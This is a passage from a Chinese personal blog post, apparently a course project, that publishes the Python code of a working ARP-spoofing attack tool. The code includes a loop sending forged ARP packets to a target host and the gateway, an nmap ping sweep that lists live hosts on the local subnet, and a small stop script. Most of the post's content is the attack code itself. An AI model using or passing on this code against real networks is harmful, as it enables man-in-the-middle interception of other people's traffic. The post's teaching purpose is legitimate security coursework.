</span><br><span class="line"></span><br><span class="line">        t = threading.Thread(</span><br><span class="line">            target=sendp,</span><br><span class="line">            args=(pkt_station,),</span><br><span class="line">            kwargs=&#123;<span class="string">'inter'</span>:<span class="number">1</span>, <span class="string">'iface'</span>:interface&#125;</span><br><span class="line">        )</span><br><span class="line">        t.start()</span><br><span class="line">        t.join()</span><br><span class="line"></span><br><span class="line">        print(str(i) + <span class="string">" [*]向目标计算机发送一个ARP欺骗包"</span>)</span><br><span class="line"></span><br><span class="line">        s = threading.Thread(</span><br><span class="line">            target=sendp,</span><br><span class="line">            args=(pkt_gateway,),</span><br><span class="line">            kwargs=&#123;<span class="string">'inter'</span>:<span class="number">1</span>, <span class="string">'iface'</span>:interface&#125;</span><br><span class="line">        )</span><br><span class="line">        s.start()</span><br><span class="line">        s.join()</span><br><span class="line"></span><br><span class="line">        print(str(i) + <span class="string">" [*]向"</span>+other+<span class="string">"发送一个ARP欺骗包"</span>)</span><br><span class="line">        <span class="comment">#a.msgbox(msg= str(i) + " [*]向目标计算机发送一个ARP欺骗包"+str(i) + " [*]向"+other+"发送一个ARP欺骗包", title= '', ok_button='开始', image=None, root=None)</span></span><br><span class="line">        i += <span class="number">1</span></span><br><span class="line">        time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"></span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> easygui <span class="keyword">as</span> a</span><br><span class="line"><span class="keyword">import</span> netifaces,nmap</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_gateways</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">return</span> netifaces.gateways()[<span class="string">'default'</span>][netifaces.AF_INET][<span class="number">0</span>]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_ip_lists</span><span class="params">(ip)</span>:</span></span><br><span class="line">    ip_lists = []</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">256</span>):</span><br><span class="line">        ip_lists.append(<span class="string">'&#123;&#125;&#123;&#125;'</span>.format(ip[:<span class="number">-1</span>], i))</span><br><span class="line">    <span class="keyword">return</span> ip_lists</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">(ip=None)</span>:</span></span><br><span class="line">    s=<span class="string">'正在扫描局域网中存活的主机'</span></span><br><span class="line">    a.msgbox(msg=s, title= <span class="string">'ARP欺骗'</span>, ok_button=<span class="string">'continue'</span>, image=<span class="keyword">None</span>,root=<span class="keyword">None</span>)</span><br><span class="line">    m=<span class="string">'网络中的存活主机:：'</span></span><br><span class="line">    ip=get_gateways()</span><br><span class="line">    ip_lists=get_ip_lists(ip)</span><br><span class="line">    nmScan,temp_ip_lists,hosts = nmap.PortScanner(),[],ip[:<span class="number">-1</span>]+<span class="string">'0/24'</span></span><br><span class="line">    ret = nmScan.scan(hosts=hosts, arguments=<span class="string">'-sP'</span>)</span><br><span class="line">    print(<span class="string">'扫描时间：'</span>+ret[<span class="string">'nmap'</span>][<span class="string">'scanstats'</span>][<span class="string">'timestr'</span>]+<span class="string">'\n命令参数:'</span>+ret[<span class="string">'nmap'</span>][<span class="string">'command_line'</span>])</span><br><span class="line">    <span class="keyword">for</span> ip <span class="keyword">in</span> ip_lists:</span><br><span class="line">        print(<span class="string">'ip地址：'</span>+ip+<span class="string">'：'</span>)</span><br><span class="line">        <span class="keyword">if</span> ip <span class="keyword">not</span> <span class="keyword">in</span> ret[<span class="string">'scan'</span>]:</span><br><span class="line">            temp_ip_lists.append(ip)</span><br><span class="line">            print(<span class="string">'扫描超时'</span>)</span><br><span class="line">        <span class="keyword">else</span>:print(<span class="string">'已扫描到主机，主机名：'</span>+ret[<span class="string">'scan'</span>][ip][<span class="string">'hostnames'</span>][<span class="number">0</span>][<span class="string">'name'</span>])</span><br><span class="line">    print(str(hosts) +<span class="string">' 网络中的存活主机:'</span>)</span><br><span class="line">    <span class="keyword">for</span> ip <span class="keyword">in</span> temp_ip_lists:ip_lists.remove(ip)</span><br><span class="line">    <span class="keyword">for</span> ip <span class="keyword">in</span> ip_lists:</span><br><span class="line">        m+=ip+<span class="string">'\n'</span></span><br><span class="line">    a.msgbox(msg=m , title= <span class="string">'ARP欺骗'</span>, ok_button=<span class="string">'start'</span>, image=<span class="keyword">None</span>, root=<span class="keyword">None</span>)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<h2 id="end-py"><a href="#end-py" class="headerlink" title="end.py"></a>end.py</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line">import easygui</span><br><span class="line">import os</span><br><span class="line"></span><br><span class="line">cc =easygui.ccbox(msg=&apos;点击finish结束攻击&apos;, title=&apos;ARP欺骗 &apos;, choices=(&apos;continue&apos;, &apos;finish&apos;), image=None)</span><br><span class="line"></span><br><span class="line">if cc==0:</span><br><span class="line">        os.system(r&quot;echo 1 &gt; /root/桌面/ARP欺骗/flag.txt&quot;)</span><br></pre></td></tr></table></figure>
<h2 id="flag-txt"><a href="#flag-txt" class="headerlink" title="flag.txt"></a>flag.txt</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1</span><br></pre></td></tr></table></figure>
<p>flag这个文件里写1还是0都可以。因为每次程序运行都会初始化一遍。</p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/28/ubuntu相关配置/" rel="next" title="ubuntu相关配置">
                <i class="fa fa-chevron-left"></i> ubuntu相关配置
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/09/19/2019黑盾杯/" rel="prev" title="2019黑盾杯">
                2019黑盾杯 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Daftar Isi
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Ikhtisar
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">lh</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">86</span>
                    <span class="site-state-item-name">posting</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">11</span>
                    <span class="site-state-item-name">kategori</span>
                  </a>
                </div>
              

              
            </nav>
          

          

          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#参考"><span class="nav-number">1.</span> <span class="nav-text">参考</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#知识点"><span class="nav-number">2.</span> <span class="nav-text">知识点</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#用命令行传递参数：argparse"><span class="nav-number">2.1.</span> <span class="nav-text">用命令行传递参数：argparse</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#程序暂停"><span class="nav-number">2.2.</span> <span class="nav-text">程序暂停</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#undefined"><span class="nav-number">3.</span> <span class="nav-text">具体程序分析在我的课设word中，这里只写一部分</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#代码思路"><span class="nav-number">4.</span> <span class="nav-text">代码思路</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#代码"><span class="nav-number">5.</span> <span class="nav-text">代码</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#arp-py（主程序）"><span class="nav-number">5.1.</span> <span class="nav-text">arp.py（主程序）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#end-py"><span class="nav-number">5.2.</span> <span class="nav-text">end.py</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#flag-txt"><span class="nav-number">5.3.</span> <span class="nav-text">flag.txt</span></a></li></ol></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lh</span>

  

  
</div>


  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Tema – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v6.7.0</div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="Total Visitors">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="Total Views">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/src/utils.js?v=6.7.0"></script>

  <script src="/js/src/motion.js?v=6.7.0"></script>



  
  


  <script src="/js/src/affix.js?v=6.7.0"></script>

  <script src="/js/src/schemes/pisces.js?v=6.7.0"></script>



  
  <script src="/js/src/scrollspy.js?v=6.7.0"></script>
<script src="/js/src/post-details.js?v=6.7.0"></script>



  


  <script src="/js/src/bootstrap.js?v=6.7.0"></script>



  



  











  





  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
